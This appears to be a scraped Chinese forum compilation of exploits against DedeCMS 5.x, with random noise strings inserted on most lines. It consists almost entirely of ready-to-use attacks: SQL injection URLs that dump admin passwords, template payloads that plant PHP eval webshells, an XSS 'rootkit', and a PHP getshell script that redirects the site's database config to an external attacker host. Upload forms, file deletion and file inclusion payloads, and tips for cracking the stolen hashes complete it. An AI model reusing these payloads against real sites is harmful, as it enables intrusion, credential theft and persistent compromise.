|
|
. I0 Z& Q3 U' X/ I hDedecms 5.6 rss注入漏洞
5 T* E" k: \! |0 _1 `) rhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
( Z7 q+ b" Q+ g. V5 c" v: z S0 q% [9 N* {0 R+ a7 s) v
1 t5 O# t$ z! F9 h- _, d- P
! @" j9 }/ S3 z; P3 v
0 T* `% r, M- |4 H. q8 h# q9 \) z; t K+ P, N, z
# R {+ s( _! m" \& R5 V+ j2 U4 l9 ~& p0 P, K; z
0 W; @/ ]" v7 e4 z g
DedeCms v5.6 嵌入恶意代码执行漏洞$ ^. d- x, ^3 q3 I
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
5 a# y1 s+ N7 Q3 x发表后查看或修改即可执行 G& j; w1 k) J5 B6 r
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}+ _& u- V' j4 P2 ?* B* n
生成x.php 密码xiao,直接生成一句话。2 b8 Y% h' Q+ @* G! F. v
7 T: C( e' f4 k) _" H6 S% y' t- g! Q, J9 x; M+ S4 n
& b' q4 G7 i9 [ h9 l
, O, t( a* k4 j# \' S" v" J8 }6 U# |
7 V5 l: F O1 |5 a, C
& w& T/ U% n& a: O9 q+ f: @7 K: b) N, K Q
Dede 5.6 GBK SQL注入漏洞4 U `4 I! V( r* h- j4 h2 r
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';* }5 F9 o- a! Z. D
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
2 T9 A; R8 E. nhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 h5 i% B' ]6 r2 ^1 N4 @6 A8 t1 [, }
+ C8 e4 {- N( C, @+ I& m1 R
3 c U9 L% Q8 l# V2 ]
( y8 S+ Y, S, R1 W8 P- Q& D
" P' r7 Q& ?8 b' ^; h5 P$ ~$ F
8 s1 ^+ Z' R, v5 o! l) n, l* q2 \# I' U- A4 i/ @
: q3 @$ m3 R" M3 q7 T7 c
. m' k9 c/ t0 Y6 q9 F) SDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
. l! ~. M6 |3 ^, ohttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
1 a* r+ m% C) @" a C! T& o
T! {* @$ G- X9 M- g" }4 }/ Z0 Y
5 ^- |: E# T& E% C2 y$ x
2 r# }* W6 }- n. h# a* r
: k' ^0 q# J+ M) d3 J
/ y4 ?1 |: M' F2 W. b2 ^5 n! o6 yDEDECMS 全版本 gotopage变量XSS漏洞. V3 f5 V/ R5 G* L
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 - M8 \, x4 @( L+ @$ @8 {
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="( S! Y, O+ ?$ L- ^ e. e
' n( l0 B" r% f3 o+ ?0 w1 ^) r+ z, l* G6 [% t3 ]
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
( B8 c. p- P2 [" ehttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda* Y9 D/ b" Y9 F5 G* D! q
8 d, X7 H! U& I" b$ `+ |$ O8 @
* A6 h1 }- ?4 C7 K0 ~' U5 j
http://v57.demo.dedecms.com/dede/login.php
+ u& n. ^5 w! H1 R7 e
; j4 p. R |1 L/ C. [
; P0 d7 M5 u% M2 }6 p. L3 Ycolor=Red]DeDeCMS(织梦)变量覆盖getshell
. \# Q6 |3 t4 s#!usr/bin/php -w8 V7 k0 }3 k2 ?/ F6 {3 D) T
<?php
3 L' U; X0 R1 J2 h/ u9 Kerror_reporting(E_ERROR);+ r6 l5 C: c2 U
set_time_limit(0);
7 G. J. C3 @. y b0 O0 z/ Lprint_r('
. r% H7 l8 p% eDEDEcms Variable Coverage
3 h2 i8 Q# q1 ]1 Y: O4 n& X6 FExploit Author: www.heixiaozi.comwww.webvul.com
6 F( V5 K7 i6 G; J4 ^3 f# l) B3 ] }+ u);! D0 ^5 [# J2 o' w! F) E" r" S2 z7 i/ n n
echo "\r\n";
8 \! s2 {4 j9 |& U+ I# V; Q4 c, Qif($argv[2]==null){3 u% f0 E+ R( ^3 u( W" j6 _7 c
print_r('* f- s0 \: b: g; k- V! V* N& `
+---------------------------------------------------------------------------+
: M% j* B! n% x, G6 h+ N6 kUsage: php '.$argv[0].' url aid path
4 ]" w" ~) Q$ l1 Z0 L' J! r( _aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/9 I E- `/ L2 q# U2 Q' r8 W
Example:
9 a- }1 E6 h1 c0 Jphp '.$argv[0].' www.site.com 1 old
9 W- [6 C7 u% o! b( c, I+---------------------------------------------------------------------------+2 q7 r8 r- l4 r: f
');
9 H' H. g5 r6 n+ J" B. c$ q6 vexit;
4 H% M6 S0 ^+ Y% S. t}
4 `/ F1 I' k3 v( X* p6 ~0 R$url=$argv[1];2 E! b) c1 ?7 E7 }3 j
$aid=$argv[2];
8 _( C m& p5 _8 p( H7 ]6 e$path=$argv[3];9 Y( d& `6 N& A/ q: [# l$ m
$exp=Getshell($url,$aid,$path);; g; p- L& x" l |" y5 z
if (strpos($exp,"OK")>12){% \8 u) C7 X( F4 V" }% W
echo "$ q9 T1 W* L' G. S8 `! b( c# Z" m
Exploit Success \n";! v$ N0 Y" P( B6 @( f
if($aid==1)echo "
4 |! S5 o" b, y- Z ^Shell:".$url."/$path/data/cache/fuck.php\n" ;0 a5 \* W5 N. s) L/ b
, a, c+ |: F6 r8 _3 T" o; M
/ W' C6 O& R/ U+ n N$ x3 Tif($aid==2)echo "
2 V1 L0 ^7 O/ `6 a2 GShell:".$url."/$path/fuck.php\n" ;# D+ b# `! D- _* Y+ H' P8 z
: A2 b1 y: L* \* }$ c
) r/ ^9 e7 J; K2 Kif($aid==3)echo "5 k4 ] G4 B2 w# j. p$ F
Shell:".$url."/$path/plus/fuck.php\n";
& o' T9 v" z+ b% J6 U3 u- L7 n) l8 G. P
2 {# e9 c3 `4 J8 n4 L- S! r}else{/ x& \7 ], X5 A/ o) F5 O# \
echo "
0 x- b- i2 d& [7 F( n7 D! OExploit Failed \n";/ a5 G4 J! E' K5 Q/ o
}
2 Y, q+ \7 i! g4 z2 gfunction Getshell($url,$aid,$path){* L8 {4 C& |( j: |3 r/ M
$id=$aid;
9 n$ \" {$ w; i' d, M$host=$url;% e5 {/ u2 [, _; f
$port="80";9 P) A7 u' f2 V, Z! y# c
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
, s2 B9 u4 a$ q# |" |$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
, y" L! F) M6 n* I( \$data .= "Host: ".$host."\r\n";
: I* @- \+ u7 K0 \+ Z8 E2 @$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";+ o- x8 @, {: ~$ T
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";5 b- j) t# \' ]0 n' h$ U& U0 H' J
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
5 u6 U, W& V% p* f2 j {; u( x2 ?//$data .= "Accept-Encoding: gzip,deflate\r\n";
' x$ o, M: \5 s: l$ v$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
4 E6 v( \% e U6 p0 a" j$data .= "Connection: keep-alive\r\n";# P$ M: d/ |3 E! E8 F
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
2 I4 l. s( k4 L$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
6 q/ ^5 x w2 E" _* B$data .= $content."\r\n";
; t8 j' l1 I- h. l' D$ock=fsockopen($host,$port);, e) q8 e9 z1 }3 N
if (!$ock) {
9 m/ c- N! q' K) \) W8 w) Recho "( L$ {9 J+ S; U) T! V
No response from ".$host."\n";
3 A) a, h" S; s; \" c9 O}
/ [9 _% @/ k9 o/ A, Z% l8 jfwrite($ock,$data);9 {( V( y+ z+ Z
while (!feof($ock)) {( S. S$ P: z) h. V: S: U
$exp=fgets($ock, 1024);
. j& u3 l" y7 w3 v7 J) Wreturn $exp;
8 v1 n1 Z* [0 v, g$ X1 ]' B6 \: Q}4 E9 M9 t- | |7 }
}0 |8 d& L( N5 f* _3 n" R# m# u
) H9 q/ J; D9 e( r( b8 {; t" p1 \
# d9 \4 z3 z6 {4 S?>
% |# p* n/ Y% |% f5 M/ l
' n$ Z5 E4 _) Z6 L
9 v% X$ c2 h2 z8 D* E! q7 m/ R0 h- c# }. e1 P
. {' N& f6 U! n& ^# R7 y3 `
/ H4 J0 \+ E+ h# k: Q
( ^6 C, L* z& d! }: V; Z5 R! w4 u: M3 P" u" X; H# ^% K8 U
7 X/ k2 |; ?" P0 o# w
' a2 T, Y8 o. t& D$ _
. G6 Q5 q: U! _7 m
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)0 y- E# ~" e' a
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root/ R3 m1 O. T! l" L
3 |5 E1 K7 X$ n0 C' ]
% C& W& \, Q. H0 g
把上面validate=dcug改为当前的验证码,即可直接进入网站后台5 k0 |7 P3 B. I& @( g
1 Q$ l( b$ ~" D" W# K. N. `% s8 M
* X( O) S" o% a- G3 I X此漏洞的前提是必须得到后台路径才能实现
6 q0 @" C% V/ Q! i
4 I6 c) E6 O7 f/ @
8 L3 H' s. p1 [ g; L1 t* T1 m9 N
5 k* C# a) v( l: g( q8 |& H& W# v5 _% O0 s# I5 H8 E
& T7 ^8 @' K* U5 V% r! p {- ], n7 }5 f% r* A, ~
, z; _+ U6 ~2 \6 \5 f
$ i% k2 E5 D; d; a' S
- y5 `5 b) k# G# C
" ^3 x& }0 I" r- t1 L- q
Dedecms织梦 标签远程文件写入漏洞
3 {2 Z. {* g" p9 ?, {* n. ~: I前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
5 W1 K4 Y6 S0 i" i9 j" `( E7 e) ^. Y# J9 [
$ U; U, _% x/ ]! M( F2 u/ e
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 3 b5 }9 K+ h2 V" m4 C% P2 f
<form action="" method="post" name="QuickSearch" id="QuickSearch">
5 M2 U6 J- J+ K0 g7 j$ @! Y; u, s<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />- s7 R% h! d% y$ Y( e2 L7 Y
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
+ \6 M6 \8 l+ c; Z: o<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />: n/ j( j" Z! {/ @
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br /> |8 t) Q2 Q5 \) ]
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />3 E# C% |7 v$ G0 J
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
1 H' P& V. ? e% ^# T<input type="text" value="true" name="nocache" style="width:400">
1 j B$ v% E' n1 T1 f" X<input type="submit" value="提交" name="QuickSearchBtn"><br />
2 u9 K9 P+ b' k2 O8 a</form>9 h- x/ d- @% t: U# w! Y7 _
<script>
0 J! r3 q( S; }0 ?6 R3 ~. g6 Afunction addaction()
. x4 |6 m; G/ s& I* x8 M( L{
2 I- L6 s+ m2 U) P# \' v' ydocument.QuickSearch.action=document.QuickSearch.doaction.value;9 ]- I | J+ h3 ^8 a
}
+ O$ D% {" n0 y7 O! m</script>
9 o: B; O) K* n7 \4 k; s: [7 g# {$ p$ n! L; [
7 j$ t4 |- V5 O2 C) R& m
$ ]% @9 u8 E% z9 M
6 v5 P' T: v1 }' m* z
8 M- h) O, N0 H m& y( |. Z4 g% v2 ~* o0 @7 Z% L
z8 g X# V5 @6 D7 m7 v
/ P1 z, y: B. ?7 T4 T
2 Q& b1 @, l7 m) N# ?" q1 c D# r
2 L# h" g+ j; t! O6 t1 KDedeCms v5.6 嵌入恶意代码执行漏洞9 @( L* i1 Y# }# O3 e: T
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行! g5 ~* G1 ?0 {/ {: E
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}8 X" t7 H, K- m7 _
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
7 d+ n1 M" m( N: P4 k! EDedecms <= V5.6 Final模板执行漏洞
* O" A( |! V; Z) u* v( P* w2 \3 k注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:4 `* k7 h2 @$ Z7 A. n! r1 z
uploads/userup/2/12OMX04-15A.jpg
# w8 j; H' h$ w0 Z
- N* A' w: j: h& }2 |& z: M2 \* s8 R; v5 G6 z) M: x; m
模板内容是(如果限制图片格式,加gif89a):
% `* f7 j- Y( d& e1 C$ p2 ^8 J0 B+ D{dede:name runphp='yes'}$ \. j( T3 w8 O# @9 b' ^: L
$fp = @fopen("1.php", 'a');! C- r `! Y* g! k. P0 }
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
: G% p- S% Q0 R; B@fclose($fp);
3 D( F& g$ X6 f. p/ q* t{/dede:name}
- X4 w& g5 \: X$ i. O0 ?2 修改刚刚发表的文章,查看源文件,构造一个表单:0 b7 b& l7 t" a2 X$ ?4 A
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
, ^. ~, R, R4 p. x; ]<input type="hidden" name="dopost" value="save" />
0 E5 I% S7 B( z# }8 S. P<input type="hidden" name="aid" value="2" />
% T5 d( y! b: G$ [6 a<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />& E; B1 R7 C: z$ l' p9 g
<input type="hidden" name="channelid" value="1" />
. C- D( d+ v( V% M2 Z: v0 \$ P0 q7 g<input type="hidden" name="oldlitpic" value="" />( u# R1 F9 |: M8 ?
<input type="hidden" name="sortrank" value="1275972263" />
$ x1 A; D: b* c/ X2 s3 o' U3 _
9 h' C. g. Y! K/ B0 [# x8 Z: Z0 z6 Z$ E8 k; C! _
<div id="mainCp">
8 a$ c" T s8 ^) D# M# M# v" v8 x<h3 class="meTitle"><strong>修改文章</strong></h3>
* g! L% @/ G0 o! w8 z+ t9 | T: }4 i3 ?' b6 ?
$ k' j; s- s( G8 n<div class="postForm">: O0 p, ?! T7 O( F7 }+ A
<label>标题:</label># e, z& E: L2 ]5 A2 p
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>; _. ]5 J0 }% b7 B& @$ @
$ H( t# R: p+ h8 G
) b0 y4 B9 H$ J { G8 E<label>标签TAG:</label>
/ q$ j# `, a* _2 H<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
: l) W; p$ o4 n2 ^* j- e
! B0 R- S+ N, F4 W! L& g8 J7 Y4 g4 _* N( n8 T. r; }0 v
<label>作者:</label>( }* e+ Q8 q& w2 d, w& y' f
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>+ h+ [- I# p" s! T$ ~9 f8 [, I' w( H0 g
+ n* l$ w" V/ C3 f" Q- v* ^* k; F$ x1 W: a
<label>隶属栏目:</label>
9 T' G- L" f$ K4 Q4 L<select name='typeid' size='1'>$ Q6 @& K& K8 m. u
<option value='1' class='option3' selected=''>测试栏目</option>
% _* @( i8 M+ _4 q</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)$ A+ ?1 y0 h) `; B7 m
% s* L; p/ U- J9 t
3 x0 X9 ]' r8 j* \
<label>我的分类:</label>
2 u/ O' J6 {% X0 e" ]4 p' m<select name='mtypesid' size='1'>
$ e; Y" t* N% X6 z<option value='0' selected>请选择分类...</option>) ^* s. g& @' z" ~& `
<option value='1' class='option3' selected>hahahha</option>
$ Q+ I3 e# w9 y n' \</select>( N: s, D3 E+ L
3 o& O% D) V# E% r: R
' S* v9 Q' ^ @7 }5 w: n<label>信息摘要:</label>
5 Q0 |, A3 B" @7 X4 z<textarea name="description" id="description">1111111</textarea>( W7 o& x/ a) [; z0 N) `- ~
(内容的简要说明)
4 A9 ]4 ]5 d" [' Y# |. m2 f
$ N; I4 D1 k9 o, Q
. S9 f; M6 M7 F% T<label>缩略图:</label>8 v- T, J R9 T. a1 t
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
( h5 |2 R, f h( \, c! C0 S
1 y% w* T+ H3 Y* C' _8 [* k& p a$ N R; {3 T( z0 f9 i. v9 w
<input type='text' name='templet'& p$ y/ L4 i: c2 Q3 p2 a8 F
value="../ uploads/userup/2/12OMX04-15A.jpg">
7 w' V9 `9 t# \& E& ]6 B+ N<input type='text' name='dede_addonfields'. I9 _! f, F. s& ]$ C
value="templet,htmltext;">(这里构造) A* X7 j0 ?$ S, {! q, q* {
</div>3 d/ `$ c1 a7 h7 }
" m* i: ^, m3 {5 {% b" ]; s& b7 ^0 X9 u) n
3 w0 ]% K; N h3 y8 R<!-- 表单操作区域 -->
: L# P' j8 G& t8 X<h3 class="meTitle">详细内容</h3>
3 _9 _0 w" F$ b' x s& m$ E _$ ?! z' u! S
, a. c; W3 q, E<div class="contentShow postForm">" K( u* l4 r$ P$ Y
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>, z8 C! r' Z0 M
9 c- j& ]* K2 n0 Z& [+ W! {
3 i/ s, @3 B a% W<label>验证码:</label>! X' w$ V$ Z& d8 y
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
8 e9 S! \. m& M* d<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />! a, |- R6 p; S- i% z* w
. K3 ^2 n a/ J/ _
% [% L6 D; D! H1 V<button class="button2" type="submit">提交</button>3 { [" S, m! P9 s& M
<button class="button2 ml10" type="reset">重置</button>
" `4 R* W2 G3 n9 M</div>+ @6 W- M* U7 q/ b r
4 P" ]6 Z' K0 ?" b/ d4 F
" R# [: ]5 O4 T" z, j</div>5 s, X% Q: u9 g& i+ {* H1 y
& d/ x. f" S: W; R( z- O! b1 U
$ W9 b1 n: _3 e( v</form>. ^- r2 ~! v; u9 _6 [; |% n
5 c4 t, Y; q" T; e
; }1 v! K6 s. D! R8 @% y: a$ q提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:/ x; j: ?% Z, }3 b) ~$ z
假设刚刚修改的文章的aid为2,则我们只需要访问:6 d7 i2 Z! V' P c$ i6 M1 [
http://127.0.0.1/dede/plus/view.php?aid=2
; q2 \9 P+ h, w9 W% U, E0 L4 s即可以在plus目录下生成webshell:1.php
9 \% o0 Z: g) `; ^( \+ T) x0 k6 D7 f/ o
& \* d- \8 U1 g5 W& Q! @8 D5 e& F _, x# q( S7 v8 Z
! x7 q3 K# `+ ^5 o" f
: S6 S9 i i% B$ n9 X" q/ U
3 x" p6 r7 G- M) w
+ \. q/ n& n& H t
* B8 c' G, G9 Z% ^" o# {* G4 c& V' l% L: @7 H, N6 Q( o
( W, \6 _/ G4 w; @
5 t' A/ N# t( p, G9 \
' A# r7 U& \( p2 X- d5 o; E
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)# |+ z2 c- D0 J3 {2 ]
Gif89a{dede:field name='toby57' runphp='yes'}
$ F0 q& N& g" ^phpinfo();. b+ D4 I8 `0 W7 ^7 W
{/dede:field}; q* C9 W+ E3 D1 L, t- s; {. B; d
保存为1.gif
$ S5 Y/ h$ S, M8 U: U: u! g1 o; |<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> . l5 N0 u4 b4 k
<input type="hidden" name="aid" value="7" />
% ?; r2 \5 _8 v; G1 S5 x, ~<input type="hidden" name="mediatype" value="1" />
) M. @9 l. ?& u2 q<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
' e/ @5 |* t6 @; M6 f. k<input type="hidden" name="dopost" value="save" />
+ N0 [9 l- c6 N' x. B* J+ {5 f<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> * I0 E' F5 |5 R4 T
<input name="addonfile" type="file" id="addonfile"/> . N! J1 U) R. Z* I; I6 Z' x, H
<button class="button2" type="submit" >更改</button> 2 g2 j6 D/ N! b: k
</form>
X4 z$ b( x9 P$ m" o' A5 {9 R' {& f3 h" |+ | P
, h2 M1 E0 j& S3 {# r+ c" `# u5 [构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
: ?8 ~, m0 `+ P/ A0 w* y发表文章,然后构造修改表单如下:7 I! y. c: _: g: T4 r6 _$ `6 C
5 d" ~: S$ r# J% Q1 w9 s
7 W+ g. \) M* Z: l# X/ [, \
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 1 e6 b0 @" T4 N: p6 T' G
<input type="hidden" name="dopost" value="save" />
# Z7 L$ t; l! j9 i: N4 r/ Q# `<input type="hidden" name="aid" value="2" />
% C0 t- {4 Q, t# @: L<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 5 `2 ?' N) d' V7 @7 M
<input type="hidden" name="channelid" value="1" /> % b4 r. u1 c! e& N! a
<input type="hidden" name="oldlitpic" value="" /> $ x# M8 _3 J4 {3 g i1 j2 e
<input type="hidden" name="sortrank" value="1282049150" /> 4 Q; u6 S+ L: W& n7 z/ v
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> . \7 b- \- A2 ~2 r1 V
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> + K/ W4 ], g7 _$ S
<select name='typeid' size='1'> . q4 j7 I: q) D9 \% _, x
<option value='1' class='option3' selected=''>Test</option>
! _3 i% Q: [4 z* w1 Y) p/ X<select name='mtypesid' size='1'> % h* ~# Q/ H7 j' B$ E4 S7 b; q
<option value='0' selected>请选择分类...</option>
! \ F+ _0 \& Z<option value='1' class='option3' selected>aa</option></select> ; G# M+ n1 p- A" W, T$ u, @
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> $ x1 B: @6 g% ?& L: U( e( K
<input type='hidden' name='dede_addonfields' value="templet">
; X. |* I, F/ G5 K/ b3 ~* ~<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> & T! J1 P+ S5 ?9 {
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
; Z4 b# O: ?1 _4 w3 w1 a<button class="button2" type="submit">提交</button> ; Z7 O" H! h. \+ h T& ]
</form>) S$ w' X3 g& K0 I6 n. K/ C2 w7 x
3 H/ \+ h8 @! @8 H# v$ l9 p
, I$ w( {( c9 H0 p3 l# q; a# w1 I# ?3 p7 N
8 f7 ]1 V7 u, L2 c. G
L/ z; d. e$ \+ _5 [9 l# _8 V( S: R, x: A; p
. v9 v* Z- Z8 q! ^6 J" s7 f! W6 [' U4 i6 j: A
/ C/ Q4 f- s7 j) s1 W. M
) H. I8 F" t1 O& N3 m/ S. Z: x6 p( s, I4 ]' n2 b6 x
; m' h. g0 d0 R$ Y( k# f3 g织梦(Dedecms)V5.6 远程文件删除漏洞
X- R1 Q$ {( I0 ~8 {http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
3 l3 ?2 f e/ Q* H3 w9 y+ c: y# L3 s7 k9 J7 V; }5 h" g& {
* T2 _; M8 @5 Y/ H5 q! T/ b* K! J4 V& Q
5 l- y C T, V. i- Z
1 G3 `2 v' w5 I0 Y) Z6 K- t/ H& s( @9 N9 V: ]! V7 o
, x8 n+ J1 C7 J4 e; N( m/ R8 l
' Y, Q) ?0 Y& g) \: q3 J" a
# \) q6 M5 G! r; Z5 r0 q
0 j! V" K/ G3 H; |5 t* y- D8 e) K$ `, E4 `
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
! t. l& z* h; Chttp://www.test.com/plus/carbuya ... urn&code=../../
% Y2 W' e; a" d3 A% j) o f4 k) y: J& n( Q6 s& R
1 X" m7 Y+ c9 o+ r& P+ W
" v, ]" P G( y; o8 I$ Q
! s" v- h9 A: Y1 Q% C
2 e# c. j: K, W5 w8 B5 r: A" F9 G B# j
2 H3 p( ?% C* r4 P
! g5 p0 J( r6 ]
0 _! y. \) l m( P
1 z K, }/ C2 B& D2 D$ E4 }DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 # Y* C7 y3 e4 z* B# Y" b
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
" a8 {: k3 G2 I9 r5 k- t密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
9 u6 `. \. [2 B3 x4 z" v+ i, r( \
) y8 Q3 O7 }. \1 }2 K2 i# Z
" ?8 L1 k c% j; e- O9 h+ X! ]7 |- D
5 g# W- [3 |3 v* p! \
" X% E5 }% Q7 Y- }- }0 `3 d. C$ u3 D: B2 x/ ^2 b7 l. f
) K) k& i9 e2 N T' J! T; b. C0 a! ?6 _! j
2 [! d9 o# p) a0 h- B% _5 _# m( a5 D
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
1 O) l+ k% z3 l. ghttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='! d x |$ c2 y
5 B1 H0 I# v1 V, Z5 ?: o% {
) w; t, ]/ d2 ~8 |5 A/ w( O, i9 l! ^, R! x1 k1 n' b
- N# R* K/ m1 z
2 |: N% o/ l7 K. m
9 Z" h7 k0 B7 |. G( u) j: h+ m" Y
* o: I7 b% |, t& U
1 ]; f; l2 Z6 q# f# \, Y; }. J h9 w, J+ d" V8 M
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
